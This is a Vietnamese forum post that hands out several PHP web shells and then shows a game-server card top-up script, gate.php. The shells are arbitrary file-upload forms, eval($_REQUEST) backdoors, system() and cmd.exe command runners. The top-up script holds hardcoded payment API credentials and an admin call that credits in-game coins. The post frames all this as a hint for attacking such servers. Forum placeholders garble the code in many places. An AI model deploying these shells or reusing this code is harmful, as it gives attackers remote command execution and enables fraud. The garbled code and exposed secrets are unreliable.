Mình gợi ý cho các bạn chút thế này nhé
1- code file shell của nó đây
<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
error_reporting(0);
$docr = $_SERVER["DOCUMENT_ROOT"];
echo <<<HTML
<p>
<p>File Upload</b></p>
</p>
<table>
<form enctype="multipart/form-data" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td><font size="1">Your File : </font> </td>
<td>
<input size="48" name="file" type="file"></td>
</tr>
<tr>
<td><font size="1">Upload Dir : </font> </td>
<td>
<input size="48" value="$docr/" name="path" type="text">
<input type="submit" value="Upload"></td>
$tend
HTML;
if (isset($_POST["path"])){
$uploadfile = $_POST["path"].$_FILES["file"]["name"];
if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
echo "File uploaded to : $uploadfilen";
echo "- Size : " .$_FILES["file"]["size"]. "n";
} else {
print "Error Upload File :n";
}
}
}
?>
<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
eval($_REQUEST['dct']);
?>
<?php
eval($_REQUEST['dct']);
?>
<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
<?php
if($_GET['id']=='login')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=login">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>
<?php
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
echo '<meta <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>"Content-Type" content="text/html; charset=utf-8" />';
echo '<form method="post">
Command:<input type="text" name="id" value=""/></br>
<button type="submit">Execute</button>
</form>';
$command=$_POST['id'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}
?>
2- code file nạp thẻ ví dụ là gate.php
<?php
/**
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
*/
if (!defined('NetVWEB')) die("Ban khong co quyen truy cap he thong");
if ($Use_CardGATE != 1) {
echo "<center>Chức năng không có hoặc không được sử dụng</center>";
}
else {
include('config/config_napthe_gate.php');
include('config/config_napthe.php');
if ( $khuyenmai_gate > 0) {
$menhgia10000k = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000k = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000k = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000k = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000k = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000k = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000k = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000k = $menhgia500000*(1+($khuyenmai_gate/100));
}
if (isset($_POST['action']))
{
$action = $_POST['action'];
if ($action == 'vpoint_gate')
{
$cardtype = "GATE";
$menhgia = $_POST['menhgia'];
$card_num = $_POST['card_num'];
$card_serial = $_POST['card_serial'];
$taikhoan=$_SESSION['mu_username'];
$url = '<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>';
if( $sendsv === false ) { $error = "Tốc độ xử lý của bạn quá nhanh, vui lòng chờ vài giây rồi tiếp tục thực hiện."; }
elseif(empty($menhgia))
{
$error = "Chưa chọn mệnh giá thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $menhgia))
{
$error = "<font size='4' color='red'>Dữ liệu lỗi - Mệnh giá chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_num)) {
$error = "Chưa điền Mã thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $card_num))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_num . Chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_serial)) {
$error = "Chưa điền Serial thẻ GATE";
}
elseif (preg_match("/[^a-zA-Z0-9$]/", $card_serial))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_serial . Serial Chỉ được sử dụng chu a-z, A-Z và số (1-9).</font>";
}
else {
if($cardtype=='MobiPhone'){$mang = "MOBI";}
elseif($cardtype=='Viettel'){$mang = "VIETEL";}
elseif($cardtype=='GATE'){$mang = "GATE";}
elseif($cardtype=='VinaPhone'){$mang = "VINA";}
else $cardtype ="VinaPhone";
$bk = '<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>';
$merchant_id = '18343';
$api_username = '12330238230';
$api_password = '12330238230987stdyfAsd';
$transaction_id = time();
$secure_code = '5f96b57ac4114f5e';
$arrayPost = array(
'merchant_id'=>$merchant_id,
'api_username'=>$api_username,
'api_password'=>$api_password,
'transaction_id'=>$transaction_id,
'card_id'=>$mang,
'pin_field'=>$card_num,
'seri_field'=>$card_serial,
'algo_mode'=>'hmac'
);
ksort($arrayPost);
$data_sign = hash_hmac('SHA1',implode('',$arrayPost),$secure_co de);
$arrayPost['data_sign'] = $data_sign;
$curl = curl_init($bk);
curl_setopt_array($curl, array(
CURLOPT_POST=>true,
CURLOPT_HEADER=>false,
CURLINFO_HEADER_OUT=>true,
CURLOPT_TIMEOUT=>30,
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>>CURLAUTH_DIGEST|CURLAUTH_BASIC,
CURLOPT_USERPWD=>CORE_API_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>':'.CORE_API_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
CURLOPT_POSTFIELDS=>$arrayPost
));
$data = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>);
$result = json_decode($data,true);
if($status==200){
$amount = $result['amount'];
switch ($amount) {
case 10000: $xu = $menhgia10000k; break;
case 20000: $xu = $menhgia20000k; break;
case 30000: $xu = $menhgia20000k; break;
case 50000: $xu= $menhgia50000k; break;
case 100000: $xu = $menhgia100000k; break;
case 200000: $xu = $menhgia200000k; break;
case 300000: $xu = $menhgia200000k; break;
case 500000: $xu = $menhgia500000k; break;
case 1000000: $xu = $menhgia1000000k; break;
}
$fields = array(
//'customerid' => urlencode($_POST['customerid']),
'submit' => urlencode('Submit'),
'datatype' => urlencode('gcoin'),
'acc' => urlencode($taikhoan),
'plusminus' => urlencode('0'),
'value' => urlencode($xu),
'username' => urlencode('admin'),
//'useradmin' => urlencode('admin')
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch, CURLOPT_<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> array("X-Requested-With: XML<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>"));
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//execute post
$resultkq = curl_exec($ch);
//close connection
curl_close($ch);
$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
//$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
} else{
$error = $result['errorMessage'];
}
}
}
}
$menhgia10000_km = 0;
$menhgia20000_km = 0;
$menhgia30000_km = 0;
$menhgia50000_km = 0;
$menhgia100000_km = 0;
$menhgia200000_km = 0;
$menhgia300000_km = 0;
$menhgia500000_km = 0;
//Gcoin khi nạp thẻ GATE nhiều hơn các thẻ khác
if ( $khuyenmai_gate > 0) {
$menhgia10000 = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000 = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000 = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000 = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000 = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000 = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000 = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000 = $menhgia500000*(1+($khuyenmai_gate/100));
}
//Khuyen mai chung
if ($khuyenmai == 1 ) {
$menhgia10000_km = $menhgia10000*($khuyenmai_phantram/100);
$menhgia20000_km = $menhgia20000*($khuyenmai_phantram/100);
$menhgia30000_km = $menhgia30000*($khuyenmai_phantram/100);
$menhgia50000_km = $menhgia50000*($khuyenmai_phantram/100);
$menhgia100000_km = $menhgia100000*($khuyenmai_phantram/100);
$menhgia200000_km = $menhgia200000*($khuyenmai_phantram/100);
$menhgia300000_km = $menhgia300000*($khuyenmai_phantram/100);
$menhgia500000_km = $menhgia500000*($khuyenmai_phantram/100);
}
$page_template = "templates/napthe/gate.tpl";
}
?>
Như vậy là các bạn biết phải làm thế nào rồi chứ?
Chúc may mắn thành công!